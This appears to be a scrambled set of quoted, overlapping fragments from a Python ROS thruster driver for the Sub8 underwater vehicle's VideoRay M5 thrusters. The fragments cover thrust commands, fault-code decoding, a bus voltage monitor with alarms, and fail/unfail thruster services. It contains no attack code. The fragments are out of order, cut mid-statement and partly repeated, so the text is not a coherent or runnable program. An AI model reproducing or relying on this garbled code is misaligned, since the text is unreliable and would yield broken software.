"voltage self.t = time def __init__(self, window_duration): ''' window_duration - float (amount of",
"the particular thruster ''' self.failed_thrusters = set() # This is only determined by",
"for port in self.ports.values(): for thruster_name in port.online_thruster_names.copy(): self.command_thruster(thruster_name, 0.0) def fail_thruster(self, srv):",
"are good (user managed) # Alarms self.thruster_out_alarm = AlarmBroadcaster(\"thruster-out\") AlarmListener(\"thruster-out\", self.check_alarm_status, call_when_raised=False) #",
"or offline offline_on_port = target_port.get_offline_thruster_names() for offline in offline_on_port: if offline not in",
"or clears the thruster out alarm Updates the 'offline_thruster_names' parameter accordingly Sets the",
"thruster If there are any updates to the list of failed thrusters, it",
"''' failed_before = {x for x in self.failed_thrusters} for thrust_cmd in list(msg.thruster_commands): self.command_thruster(thrust_cmd.name,",
"age = rospy.Time.now() - reading.t if age > self.WINDOW_DURATION: self.buffer.remove(reading) def get_voltage_estimate(self): '''",
"a force command (in Newtons) to a named thruster Example names are BLR,",
"ThrusterPort objects ''' self.ports = {} # ThrusterPort objects self.thruster_to_port_map = {} #",
"= {name: rospy.Publisher('thrusters/status/' + name, ThrusterStatus, queue_size=10) for name in self.thruster_to_port_map.keys()} # These",
"+ name, ThrusterStatus, queue_size=10) for name in self.thruster_to_port_map.keys()} # These alarms require this",
"def prune_buffer(self): ''' Removes readings older than the window_duration from buffer ''' for",
"effort) # Keep track of thrusters going online or offline offline_on_port = target_port.get_offline_thruster_names()",
"a thrust_dict, which maps thruster names to the appropriate port - Given a",
"of self.fail_thruster ''' self.failed_thrusters.remove(srv.thruster_name) self.deactivated_thrusters.remove(srv.thruster_name) self.update_thruster_out_alarm() return {} if __name__ == '__main__': PKG",
"bad if thruster_status is None: return message_contents = [ 'rpm', 'bus_v', 'bus_i', 'temp',",
"offline_names}, severity=int(np.clip(len(self.failed_thrusters), 1, 5))) else: self.thruster_out_alarm.clear_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}) @thread_lock(lock) def command_thruster(self, name,",
"{} with settings specified in {}.'.format(thruster_name, config_path)) port.set_registers_from_dict(node_id=node_id, reg_dict=rosparam.load_file(config_path)[0][0]) port.reboot_thruster(node_id) # Necessary for",
"{}\".format(faults)) return def thrust_cb(self, msg): ''' Callback for receiving thrust commands These messages",
"to take effect def get_thruster_info(self, srv): ''' Get the thruster info for a",
"''' # So that thrust is not allocated to the thruster self.failed_thrusters.add(srv.thruster_name) #",
"value outside of the configured thrust bounds is commanded Raises UnavailableThrusterException if a",
"for receiving thrust commands These messages contain a list of instructions, one for",
"= argparse.ArgumentParser(usage=usage_msg, description=desc_msg) args = parser.parse_args(rospy.myargv()[1:]) rospy.init_node('videoray_m5_thruster_driver') layout_parameter = '/thruster_layout' rospy.loginfo(\"Thruster Driver waiting",
"if code & fault != 0: faults.append(fault_name) rospy.logwarn(\"Thruster: {} has entered fault with",
"back online even if comms are good (user managed) # Alarms self.thruster_out_alarm =",
"Updates the 'offline_thruster_names' parameter accordingly Sets the severity to the number of failed",
"ThrusterDriver(object): _dropped_timeout = 1.0 # s _window_duration = 30.0 # s _NODE_NAME =",
"get_voltage_estimate(self): ''' Returns average voltage in buffer ''' voltages = [] if len(self.buffer)",
"self.failed_thrusters.remove(failed) # Thruster came online # Don't try to do anything if the",
"= 0 # volts class VoltageReading(object): def __init__(self, voltage, time): self.v = voltage",
"raise IOError('/thruster_layout rosparam needs to be set before launching the thruster driver') thruster_driver",
"2017, this is just a simple rolling average with a constant width sliding",
"if it makes sense (the M5's will give nonsense feedback at times) if",
"a path to the configuration.json file containing the thrust calibration data\" parser =",
"def command_thruster(self, name, thrust): ''' Issue a a force command (in Newtons) to",
"of physical thrust bounds ({})'.format( thrust, thruster_model.thrust_bounds)) if name in self.failed_thrusters: if not",
"'OVERRVOLT', (1 << 2): 'OVERCURRENT', (1 << 3): 'OVERTEMP', (1 << 4): 'STALL',",
"ports_layout, thruster_definitions): '''Thruster driver, an object for commanding all of the sub's thrusters",
"particular thruster ''' self.failed_thrusters = set() # This is only determined by comms",
"AlarmBroadcaster(\"bus-voltage\") self.bus_voltage_pub = rospy.Publisher('bus_voltage', Float64, queue_size=1) self.warn_voltage = rospy.get_param(\"/battery/warn_voltage\", 44.5) self.kill_voltage = rospy.get_param(\"/battery/kill_voltage\",",
"# Undervolt/overvolt faults are unreliable (might not still be true - David) if",
"''' self.bus_voltage_alarm = AlarmBroadcaster(\"bus-voltage\") self.bus_voltage_pub = rospy.Publisher('bus_voltage', Float64, queue_size=1) self.warn_voltage = rospy.get_param(\"/battery/warn_voltage\", 44.5)",
"> 2: fault_codes = { (1 << 0): 'UNDERVOLT', (1 << 1): 'OVERRVOLT',",
"self.update_thruster_out_alarm() return {} if __name__ == '__main__': PKG = 'sub8_videoray_m5_thruster' usage_msg = \"Interface",
"(1 << 0): 'UNDERVOLT', (1 << 1): 'OVERRVOLT', (1 << 2): 'OVERCURRENT', (1",
"Class that estimates sub8's thruster bus voltage. As of May 2017, this is",
"= rospkg.RosPack() self.make_fake = rospy.get_param('simulate', False) if self.make_fake: rospy.logwarn(\"Running fake thrusters for simulation,",
"'OVERTEMP', (1 << 4): 'STALL', (1 << 5): 'STALL_WARN', } fault = int(message_keyword_args['fault'])",
"Commands 0 thrust to all thrusters ''' for port in self.ports.values(): for thruster_name",
"!= self._NODE_NAME: self.update_thruster_out_alarm() def update_thruster_out_alarm(self): ''' Raises or clears the thruster out alarm",
"offline is commanded a non-zero thrust ''' port_name = self.thruster_to_port_map[name] target_port = self.ports[port_name]",
"effort=effort, thrust=thrust, **message_keyword_args ) ) # Will publish bus_voltage and raise alarm if",
"by comms self.deactivated_thrusters = set() # These will not come back online even",
"config_path)) port.set_registers_from_dict(node_id=node_id, reg_dict=rosparam.load_file(config_path)[0][0]) port.reboot_thruster(node_id) # Necessary for some settings to take effect def",
"self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now()) # Undervolt/overvolt faults are unreliable (might not still be true -",
"return self.bus_voltage_pub.publish(Float64(bus_voltage)) severity = None if bus_voltage < self.warn_voltage: severity = 3 if",
"Will publish bus_voltage and raise alarm if necessary self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now()) # Undervolt/overvolt faults",
"Get the thruster info for a particular thruster name ''' query_name = srv.thruster_name",
"thruster that is offline is commanded a non-zero thrust ''' port_name = self.thruster_to_port_map[name]",
"back thruster_status = target_port.command_thruster(name, effort) # Keep track of thrusters going online or",
"alarm): # If someone else cleared this alarm, we need to make sure",
"when smarter filtering is needed ''' VMAX = 50 # volts VMIN =",
"# Thruster went offline for failed in copy.deepcopy(self.failed_thrusters): if (failed in target_port.get_declared_thruster_names() and",
"name + ')') effort = target_port.thruster_info[name].get_effort_from_thrust(thrust) # We immediately get thruster_status back thruster_status",
"thruster_model.thrust_bounds[1]: rospy.logwarn('Tried to command thrust ({}) outside of physical thrust bounds ({})'.format( thrust,",
"reading in the buffer) ''' self.bus_voltage_alarm = AlarmBroadcaster(\"bus-voltage\") self.bus_voltage_pub = rospy.Publisher('bus_voltage', Float64, queue_size=1)",
"thrusters self.fail_thruster_server = rospy.Service('fail_thruster', FailThruster, self.fail_thruster) self.unfail_thruster_server = rospy.Service('unfail_thruster', UnfailThruster, self.unfail_thruster) @thread_lock(lock) def",
"# If someone else cleared this alarm, we need to make sure to",
"rospy.Time.now()) # Undervolt/overvolt faults are unreliable (might not still be true - David)",
"each thruster If there are any updates to the list of failed thrusters,",
"faults.append(fault_name) rospy.logwarn(\"Thruster: {} has entered fault with status {}\".format(name, message_keyword_args)) rospy.logwarn(\"Fault causes are:",
"of failed thrusters (clipped at 5) ''' offline_names = list(self.failed_thrusters) if len(self.failed_thrusters) >",
"window_duration - float (amount of seconds for which to keep a reading in",
"voltage in buffer ''' voltages = [] if len(self.buffer) == 0: return None",
"bus voltage. As of May 2017, this is just a simple rolling average",
"Thrust, ThrusterStatus from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point from sub8_msgs.srv import ThrusterInfo, ThrusterInfoResponse,",
"command (in Newtons) to a named thruster Example names are BLR, FLH, etc.",
"thruster_name not in self.ports[port_name].online_thruster_names: rospy.logerr(\"ThrusterDriver: {} IS MISSING!\".format(thruster_name)) else: rospy.loginfo(\"ThrusterDriver: {} registered\".format(thruster_name)) #",
"bus voltage if enough time has passed if rospy.Time.now() - self.last_estimate_time > self.ESTIMATION_PERIOD:",
"commanded a non-zero thrust ''' port_name = self.thruster_to_port_map[name] target_port = self.ports[port_name] thruster_model =",
"__init__(self, voltage, time): self.v = voltage self.t = time def __init__(self, window_duration): '''",
"FailThruster, UnfailThruster from sub8_thruster_comm import thruster_comm_factory from ros_alarms import AlarmBroadcaster, AlarmListener lock =",
"the B-matrix self.update_thruster_out_alarm() return {} def unfail_thruster(self, srv): ''' Undoes effect of self.fail_thruster",
"srv): ''' Get the thruster info for a particular thruster name ''' query_name",
"if not np.isclose(thrust, 0): rospy.logwarn('ThrusterDriver: commanding non-zero thrust to offline thruster (' +",
"failed_before: rospy.logdebug('Failed thrusters:', self.failed_thrusters) self.update_thruster_out_alarm() def stop(self): ''' Commands 0 thrust to all",
"in buffer ''' voltages = [] if len(self.buffer) == 0: return None for",
"to a named thruster Example names are BLR, FLH, etc. Raises RuntimeError if",
"port.set_registers_from_dict(node_id=node_id, reg_dict=rosparam.load_file(config_path)[0][0]) port.reboot_thruster(node_id) # Necessary for some settings to take effect def get_thruster_info(self,",
"import rosparam import threading import argparse from geometry_msgs.msg import Vector3 from std_msgs.msg import",
"parameter accordingly Sets the severity to the number of failed thrusters (clipped at",
"a thruster that is offline is commanded a non-zero thrust ''' port_name =",
"appropriate port/thruster - Send a thruster status message describing the status of the",
"# To programmatically deactivate thrusters self.fail_thruster_server = rospy.Service('fail_thruster', FailThruster, self.fail_thruster) self.unfail_thruster_server = rospy.Service('unfail_thruster',",
"{} # ThrusterPort objects self.thruster_to_port_map = {} # node_id to ThrusterPort rospack =",
"to offline thruster (' + name + ')') effort = target_port.thruster_info[name].get_effort_from_thrust(thrust) # We",
"self.deactivated_thrusters): self.failed_thrusters.remove(failed) # Thruster came online # Don't try to do anything if",
"rospy.Time.now() - self.last_estimate_time > self.ESTIMATION_PERIOD: self.check_bus_voltage() def prune_buffer(self): ''' Removes readings older than",
"(thruster mapper blocks until it can use this service) self.thruster_info_service = rospy.Service('thrusters/thruster_info', ThrusterInfo,",
"else cleared this alarm, we need to make sure to raise it again",
"args = parser.parse_args(rospy.myargv()[1:]) rospy.init_node('videoray_m5_thruster_driver') layout_parameter = '/thruster_layout' rospy.loginfo(\"Thruster Driver waiting for parameter, {}\".format(layout_parameter))",
"and alarm.node_name != self._NODE_NAME: self.update_thruster_out_alarm() def update_thruster_out_alarm(self): ''' Raises or clears the thruster",
"for port_info in ports_layout: port_name = port_info['port'] self.ports[port_name] = thruster_comm_factory(port_info, thruster_definitions, fake=self.make_fake) #",
"with settings specified in {}.'.format(thruster_name, config_path)) port.set_registers_from_dict(node_id=node_id, reg_dict=rosparam.load_file(config_path)[0][0]) port.reboot_thruster(node_id) # Necessary for some",
"voltage <= self.VMAX: self.buffer.append(self.VoltageReading(voltage, time)) self.prune_buffer() # check bus voltage if enough time",
"failed thrusters, it will raise and alarm ''' failed_before = {x for x",
"= thruster_definitions[thruster_name]['node_id'] config_path = (rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/' + thruster_name + '.yaml') rospy.loginfo('Configuring {}",
"thruster info for a particular thruster name ''' query_name = srv.thruster_name info =",
"thruster_comm_factory(port_info, thruster_definitions, fake=self.make_fake) # Add the thrusters to the thruster dict and configure",
"problem_description='Bus voltage has fallen to {}'.format(bus_voltage), parameters={'bus_voltage': bus_voltage}, severity=severity ) self.cached_severity = severity",
"import rospy import rospkg import rosparam import threading import argparse from geometry_msgs.msg import",
"publish bus_voltage and raise alarm if necessary self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now()) # Undervolt/overvolt faults are",
"header=Header(stamp=rospy.Time.now()), name=name, node_id=thruster_model.node_id, power=power, effort=effort, thrust=thrust, **message_keyword_args ) ) # Will publish bus_voltage",
"= threading.Lock() class BusVoltageMonitor(object): ''' Class that estimates sub8's thruster bus voltage. As",
"makes sense (the M5's will give nonsense feedback at times) if voltage >=",
"thruster comms port for port_info in ports_layout: port_name = port_info['port'] self.ports[port_name] = thruster_comm_factory(port_info,",
"check bus voltage if enough time has passed if rospy.Time.now() - self.last_estimate_time >",
"Alarms self.thruster_out_alarm = AlarmBroadcaster(\"thruster-out\") AlarmListener(\"thruster-out\", self.check_alarm_status, call_when_raised=False) # Prevent outside interference # Create",
"online # Don't try to do anything if the thruster status is bad",
"from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point from sub8_msgs.srv import ThrusterInfo, ThrusterInfoResponse, FailThruster, UnfailThruster",
"if len(self.failed_thrusters) > 0: self.thruster_out_alarm.raise_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}, severity=int(np.clip(len(self.failed_thrusters), 1, 5))) else: self.thruster_out_alarm.clear_alarm(",
"= float(voltage) # Only add if it makes sense (the M5's will give",
"clear 'thruster-out' alarm if not self.failed_thrusters == failed_before: rospy.logdebug('Failed thrusters:', self.failed_thrusters) self.update_thruster_out_alarm() def",
"parser = argparse.ArgumentParser(usage=usage_msg, description=desc_msg) args = parser.parse_args(rospy.myargv()[1:]) rospy.init_node('videoray_m5_thruster_driver') layout_parameter = '/thruster_layout' rospy.loginfo(\"Thruster Driver",
"alarm.raised and alarm.node_name != self._NODE_NAME: self.update_thruster_out_alarm() def update_thruster_out_alarm(self): ''' Raises or clears the",
"time def __init__(self, window_duration): ''' window_duration - float (amount of seconds for which",
"self.ports[port_name].online_thruster_names: rospy.logerr(\"ThrusterDriver: {} IS MISSING!\".format(thruster_name)) else: rospy.loginfo(\"ThrusterDriver: {} registered\".format(thruster_name)) # Set firmware settings",
"0): rospy.logwarn('ThrusterDriver: commanding non-zero thrust to offline thruster (' + name + ')')",
"managed) # Alarms self.thruster_out_alarm = AlarmBroadcaster(\"thruster-out\") AlarmListener(\"thruster-out\", self.check_alarm_status, call_when_raised=False) # Prevent outside interference",
"try to do anything if the thruster status is bad if thruster_status is",
"Raise or clear 'thruster-out' alarm if not self.failed_thrusters == failed_before: rospy.logdebug('Failed thrusters:', self.failed_thrusters)",
"Makes a thruster unavailable for thrust allocation ''' # So that thrust is",
"thruster_status[key] for key in message_contents} power = thruster_status['bus_v'] * thruster_status['bus_i'] self.status_publishers[name].publish( ThrusterStatus( header=Header(stamp=rospy.Time.now()),",
"feedback at times) if voltage >= self.VMIN and voltage <= self.VMAX: self.buffer.append(self.VoltageReading(voltage, time))",
"the thruster info for a particular thruster name ''' query_name = srv.thruster_name info",
"float(voltage) # Only add if it makes sense (the M5's will give nonsense",
"self.check_bus_voltage() def prune_buffer(self): ''' Removes readings older than the window_duration from buffer '''",
"''' Class that estimates sub8's thruster bus voltage. As of May 2017, this",
"key in message_contents} power = thruster_status['bus_v'] * thruster_status['bus_i'] self.status_publishers[name].publish( ThrusterStatus( header=Header(stamp=rospy.Time.now()), name=name, node_id=thruster_model.node_id,",
"methods are left for when smarter filtering is needed ''' VMAX = 50",
"ThrusterPort objects self.thruster_to_port_map = {} # node_id to ThrusterPort rospack = rospkg.RosPack() self.make_fake",
"''' Loads a dictionary ThrusterPort objects ''' self.ports = {} # ThrusterPort objects",
"thrust bounds is commanded Raises UnavailableThrusterException if a thruster that is offline is",
"port/thruster - Send a thruster status message describing the status of the particular",
") ) # Will publish bus_voltage and raise alarm if necessary self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now())",
"and raises alarm if necessary ''' bus_voltage = self.get_voltage_estimate() if bus_voltage is None:",
"thruster_info def check_alarm_status(self, alarm): # If someone else cleared this alarm, we need",
"sub's thrusters - Gather configuration data and make it available to other nodes",
"in port_info['thruster_names']: self.thruster_to_port_map[thruster_name] = port_info['port'] if thruster_name not in self.ports[port_name].online_thruster_names: rospy.logerr(\"ThrusterDriver: {} IS",
"thrust=thrust, **message_keyword_args ) ) # Will publish bus_voltage and raise alarm if necessary",
"> 0: self.thruster_out_alarm.raise_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}, severity=int(np.clip(len(self.failed_thrusters), 1, 5))) else: self.thruster_out_alarm.clear_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names':",
"this service to be available before things will work rospy.wait_for_service(\"update_thruster_layout\") self.update_thruster_out_alarm() # Bus",
"thruster_layout is None: raise IOError('/thruster_layout rosparam needs to be set before launching the",
"else: rospy.loginfo(\"ThrusterDriver: {} registered\".format(thruster_name)) # Set firmware settings port = self.ports[port_name] node_id =",
"= self.ports[port_name] node_id = thruster_definitions[thruster_name]['node_id'] config_path = (rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/' + thruster_name +",
"with thrusters - Track a thrust_dict, which maps thruster names to the appropriate",
"rospy.logwarn(\"Thruster: {} has entered fault with status {}\".format(name, message_keyword_args)) rospy.logwarn(\"Fault causes are: {}\".format(faults))",
"thrust_dict, which maps thruster names to the appropriate port - Given a command",
"is offline is commanded a non-zero thrust ''' port_name = self.thruster_to_port_map[name] target_port =",
"need to make sure to raise it again if not alarm.raised and alarm.node_name",
"[] if len(self.buffer) == 0: return None for r in self.buffer: voltages.append(r.v) return",
"effort = target_port.thruster_info[name].get_effort_from_thrust(thrust) # We immediately get thruster_status back thruster_status = target_port.command_thruster(name, effort)",
"_NODE_NAME = rospy.get_name() def __init__(self, ports_layout, thruster_definitions): '''Thruster driver, an object for commanding",
"argparse from geometry_msgs.msg import Vector3 from std_msgs.msg import Header, Float64 from sub8_msgs.msg import",
"thrust allocation ''' # So that thrust is not allocated to the thruster",
"30.0 # s _NODE_NAME = rospy.get_name() def __init__(self, ports_layout, thruster_definitions): '''Thruster driver, an",
"self.ports[port_name] node_id = thruster_definitions[thruster_name]['node_id'] config_path = (rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/' + thruster_name + '.yaml')",
"if self.make_fake: rospy.logwarn(\"Running fake thrusters for simulation, based on parameter '/simulate'\") # Instantiate",
"thrusters, it will raise and alarm ''' failed_before = {x for x in",
"thruster_definitions): ''' Loads a dictionary ThrusterPort objects ''' self.ports = {} # ThrusterPort",
"with a constant width sliding window. However add_reading and get_estimate methods are left",
"messages contain a list of instructions, one for each thruster If there are",
"= int(message_keyword_args['fault']) faults = [] for code, fault_name in fault_codes.items(): if code &",
"import thruster_comm_factory from ros_alarms import AlarmBroadcaster, AlarmListener lock = threading.Lock() class BusVoltageMonitor(object): '''",
"parameter, {}\".format(layout_parameter)) thruster_layout = wait_for_param(layout_parameter) if thruster_layout is None: raise IOError('/thruster_layout rosparam needs",
"present for thruster_name in port_info['thruster_names']: self.thruster_to_port_map[thruster_name] = port_info['port'] if thruster_name not in self.ports[port_name].online_thruster_names:",
"_dropped_timeout = 1.0 # s _window_duration = 30.0 # s _NODE_NAME = rospy.get_name()",
"(1 << 4): 'STALL', (1 << 5): 'STALL_WARN', } fault = int(message_keyword_args['fault']) faults",
"the thruster status is bad if thruster_status is None: return message_contents = [",
"'UNDERVOLT', (1 << 1): 'OVERRVOLT', (1 << 2): 'OVERCURRENT', (1 << 3): 'OVERTEMP',",
"name in self.failed_thrusters: if not np.isclose(thrust, 0): rospy.logwarn('ThrusterDriver: commanding non-zero thrust to offline",
"0): 'UNDERVOLT', (1 << 1): 'OVERRVOLT', (1 << 2): 'OVERCURRENT', (1 << 3):",
"this is just a simple rolling average with a constant width sliding window.",
"that thruster_mapper updates the B-matrix self.update_thruster_out_alarm() return {} def unfail_thruster(self, srv): ''' Undoes",
"alarm, we need to make sure to raise it again if not alarm.raised",
"by port name self.load_thruster_ports(ports_layout, thruster_definitions) # Feedback on thrusters (thruster mapper blocks until",
"def get_voltage_estimate(self): ''' Returns average voltage in buffer ''' voltages = [] if",
"def __init__(self, voltage, time): self.v = voltage self.t = time def __init__(self, window_duration):",
"3 if bus_voltage < self.kill_voltage: severity = 5 if severity is not None",
"thruster self.failed_thrusters.add(srv.thruster_name) # So that it won't come back online even if comms",
"bus_voltage is None: return self.bus_voltage_pub.publish(Float64(bus_voltage)) severity = None if bus_voltage < self.warn_voltage: severity",
"= self.get_voltage_estimate() if bus_voltage is None: return self.bus_voltage_pub.publish(Float64(bus_voltage)) severity = None if bus_voltage",
"geometry_msgs.msg import Vector3 from std_msgs.msg import Header, Float64 from sub8_msgs.msg import Thrust, ThrusterStatus",
"''' port_name = self.thruster_to_port_map[name] target_port = self.ports[port_name] thruster_model = target_port.thruster_info[name] if thrust <",
"0.0) def fail_thruster(self, srv): ''' Makes a thruster unavailable for thrust allocation '''",
"thrusters\" desc_msg = \"Specify a path to the configuration.json file containing the thrust",
"None if bus_voltage < self.warn_voltage: severity = 3 if bus_voltage < self.kill_voltage: severity",
"However add_reading and get_estimate methods are left for when smarter filtering is needed",
"UnavailableThrusterException if a thruster that is offline is commanded a non-zero thrust '''",
"# Prevent outside interference # Create ThrusterPort objects in a dict indexed by",
"self.update_thruster_out_alarm() return {} def unfail_thruster(self, srv): ''' Undoes effect of self.fail_thruster ''' self.failed_thrusters.remove(srv.thruster_name)",
"fault_codes = { (1 << 0): 'UNDERVOLT', (1 << 1): 'OVERRVOLT', (1 <<",
"the number of failed thrusters (clipped at 5) ''' offline_names = list(self.failed_thrusters) if",
"if age > self.WINDOW_DURATION: self.buffer.remove(reading) def get_voltage_estimate(self): ''' Returns average voltage in buffer",
"= 50 # volts VMIN = 0 # volts class VoltageReading(object): def __init__(self,",
"'rpm', 'bus_v', 'bus_i', 'temp', 'fault', 'command_tx_count', 'status_rx_count', 'command_latency_avg' ] message_keyword_args = {key: thruster_status[key]",
"= self.thruster_to_port_map[name] target_port = self.ports[port_name] thruster_model = target_port.thruster_info[name] if thrust < thruster_model.thrust_bounds[0] or",
"particular thruster name ''' query_name = srv.thruster_name info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name] thruster_info = ThrusterInfoResponse(",
"{} IS MISSING!\".format(thruster_name)) else: rospy.loginfo(\"ThrusterDriver: {} registered\".format(thruster_name)) # Set firmware settings port =",
"return {} if __name__ == '__main__': PKG = 'sub8_videoray_m5_thruster' usage_msg = \"Interface to",
"'OVERCURRENT', (1 << 3): 'OVERTEMP', (1 << 4): 'STALL', (1 << 5): 'STALL_WARN',",
"self.unfail_thruster) @thread_lock(lock) def load_thruster_ports(self, ports_layout, thruster_definitions): ''' Loads a dictionary ThrusterPort objects '''",
"thrusters ''' for port in self.ports.values(): for thruster_name in port.online_thruster_names.copy(): self.command_thruster(thruster_name, 0.0) def",
"if (failed in target_port.get_declared_thruster_names() and failed not in offline_on_port and failed not in",
"node_id=info.node_id, min_force=info.thrust_bounds[0], max_force=info.thrust_bounds[1], position=numpy_to_point(info.position), direction=Vector3(*info.direction) ) return thruster_info def check_alarm_status(self, alarm): # If",
"wait_for_param, thread_lock, numpy_to_point from sub8_msgs.srv import ThrusterInfo, ThrusterInfoResponse, FailThruster, UnfailThruster from sub8_thruster_comm import",
"message_keyword_args = {key: thruster_status[key] for key in message_contents} power = thruster_status['bus_v'] * thruster_status['bus_i']",
"if necessary ''' bus_voltage = self.get_voltage_estimate() if bus_voltage is None: return self.bus_voltage_pub.publish(Float64(bus_voltage)) severity",
"to all thrusters ''' for port in self.ports.values(): for thruster_name in port.online_thruster_names.copy(): self.command_thruster(thruster_name,",
"failed thrusters (clipped at 5) ''' offline_names = list(self.failed_thrusters) if len(self.failed_thrusters) > 0:",
"rospy.loginfo(\"Thruster Driver waiting for parameter, {}\".format(layout_parameter)) thruster_layout = wait_for_param(layout_parameter) if thruster_layout is None:",
"= rospy.get_param(\"/battery/kill_voltage\", 44.0) self.last_estimate_time = rospy.Time.now() self.WINDOW_DURATION = rospy.Duration(window_duration) self.ESTIMATION_PERIOD = rospy.Duration(0.2) self.cached_severity",
"= \"Interface to Sub8's VideoRay M5 thrusters\" desc_msg = \"Specify a path to",
"the status of the particular thruster ''' self.failed_thrusters = set() # This is",
") return thruster_info def check_alarm_status(self, alarm): # If someone else cleared this alarm,",
"came online # Don't try to do anything if the thruster status is",
"for x in self.failed_thrusters} for thrust_cmd in list(msg.thruster_commands): self.command_thruster(thrust_cmd.name, thrust_cmd.thrust) # Raise or",
"thrust to all thrusters ''' for port in self.ports.values(): for thruster_name in port.online_thruster_names.copy():",
"rospy.Service('fail_thruster', FailThruster, self.fail_thruster) self.unfail_thruster_server = rospy.Service('unfail_thruster', UnfailThruster, self.unfail_thruster) @thread_lock(lock) def load_thruster_ports(self, ports_layout, thruster_definitions):",
"will raise and alarm ''' failed_before = {x for x in self.failed_thrusters} for",
"FLH, etc. Raises RuntimeError if a thrust value outside of the configured thrust",
"indexed by port name self.load_thruster_ports(ports_layout, thruster_definitions) # Feedback on thrusters (thruster mapper blocks",
"if severity is not None and self.cached_severity != severity: self.bus_voltage_alarm.raise_alarm( problem_description='Bus voltage has",
"bus_voltage estimate and raises alarm if necessary ''' bus_voltage = self.get_voltage_estimate() if bus_voltage",
"self.thruster_to_port_map.keys()} # These alarms require this service to be available before things will",
"will not come back online even if comms are good (user managed) #",
"buffer) ''' self.bus_voltage_alarm = AlarmBroadcaster(\"bus-voltage\") self.bus_voltage_pub = rospy.Publisher('bus_voltage', Float64, queue_size=1) self.warn_voltage = rospy.get_param(\"/battery/warn_voltage\",",
"thruster_info = ThrusterInfoResponse( node_id=info.node_id, min_force=info.thrust_bounds[0], max_force=info.thrust_bounds[1], position=numpy_to_point(info.position), direction=Vector3(*info.direction) ) return thruster_info def check_alarm_status(self,",
"Instantiate thruster comms port for port_info in ports_layout: port_name = port_info['port'] self.ports[port_name] =",
"estimate and raises alarm if necessary ''' bus_voltage = self.get_voltage_estimate() if bus_voltage is",
"return thruster_info def check_alarm_status(self, alarm): # If someone else cleared this alarm, we",
"reading.t if age > self.WINDOW_DURATION: self.buffer.remove(reading) def get_voltage_estimate(self): ''' Returns average voltage in",
"node_id=thruster_model.node_id, power=power, effort=effort, thrust=thrust, **message_keyword_args ) ) # Will publish bus_voltage and raise",
"(user managed) # Alarms self.thruster_out_alarm = AlarmBroadcaster(\"thruster-out\") AlarmListener(\"thruster-out\", self.check_alarm_status, call_when_raised=False) # Prevent outside",
"specified in {}.'.format(thruster_name, config_path)) port.set_registers_from_dict(node_id=node_id, reg_dict=rosparam.load_file(config_path)[0][0]) port.reboot_thruster(node_id) # Necessary for some settings to",
"self.buffer: voltages.append(r.v) return np.mean(voltages) def check_bus_voltage(self): ''' Publishes bus_voltage estimate and raises alarm",
"is None: return message_contents = [ 'rpm', 'bus_v', 'bus_i', 'temp', 'fault', 'command_tx_count', 'status_rx_count',",
"thrust value outside of the configured thrust bounds is commanded Raises UnavailableThrusterException if",
"of seconds for which to keep a reading in the buffer) ''' self.bus_voltage_alarm",
"outside interference # Create ThrusterPort objects in a dict indexed by port name",
"Removes readings older than the window_duration from buffer ''' for reading in self.buffer:",
"list of failed thrusters, it will raise and alarm ''' failed_before = {x",
"self.failed_thrusters.remove(srv.thruster_name) self.deactivated_thrusters.remove(srv.thruster_name) self.update_thruster_out_alarm() return {} if __name__ == '__main__': PKG = 'sub8_videoray_m5_thruster' usage_msg",
"def thrust_cb(self, msg): ''' Callback for receiving thrust commands These messages contain a",
"+ '/config/firmware_settings/' + thruster_name + '.yaml') rospy.loginfo('Configuring {} with settings specified in {}.'.format(thruster_name,",
"command thrust ({}) outside of physical thrust bounds ({})'.format( thrust, thruster_model.thrust_bounds)) if name",
"(1 << 1): 'OVERRVOLT', (1 << 2): 'OVERCURRENT', (1 << 3): 'OVERTEMP', (1",
"self.bus_voltage_pub.publish(Float64(bus_voltage)) severity = None if bus_voltage < self.warn_voltage: severity = 3 if bus_voltage",
"def check_alarm_status(self, alarm): # If someone else cleared this alarm, we need to",
"self.check_alarm_status, call_when_raised=False) # Prevent outside interference # Create ThrusterPort objects in a dict",
"severity to the number of failed thrusters (clipped at 5) ''' offline_names =",
"come back online even if comms are good self.deactivated_thrusters.add(srv.thruster_name) # So that thruster_mapper",
"for thrust_cmd in list(msg.thruster_commands): self.command_thruster(thrust_cmd.name, thrust_cmd.thrust) # Raise or clear 'thruster-out' alarm if",
"target_port.thruster_info[name].get_effort_from_thrust(thrust) # We immediately get thruster_status back thruster_status = target_port.command_thruster(name, effort) # Keep",
"(1 << 3): 'OVERTEMP', (1 << 4): 'STALL', (1 << 5): 'STALL_WARN', }",
"rospy.logwarn('Tried to command thrust ({}) outside of physical thrust bounds ({})'.format( thrust, thruster_model.thrust_bounds))",
"# s _NODE_NAME = rospy.get_name() def __init__(self, ports_layout, thruster_definitions): '''Thruster driver, an object",
"raise and alarm ''' failed_before = {x for x in self.failed_thrusters} for thrust_cmd",
"stop(self): ''' Commands 0 thrust to all thrusters ''' for port in self.ports.values():",
"unfail_thruster(self, srv): ''' Undoes effect of self.fail_thruster ''' self.failed_thrusters.remove(srv.thruster_name) self.deactivated_thrusters.remove(srv.thruster_name) self.update_thruster_out_alarm() return {}",
"to buffer ''' voltage = float(voltage) # Only add if it makes sense",
"thrusters for simulation, based on parameter '/simulate'\") # Instantiate thruster comms port for",
"= self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name] thruster_info = ThrusterInfoResponse( node_id=info.node_id, min_force=info.thrust_bounds[0], max_force=info.thrust_bounds[1], position=numpy_to_point(info.position), direction=Vector3(*info.direction) ) return thruster_info",
"ThrusterPort rospack = rospkg.RosPack() self.make_fake = rospy.get_param('simulate', False) if self.make_fake: rospy.logwarn(\"Running fake thrusters",
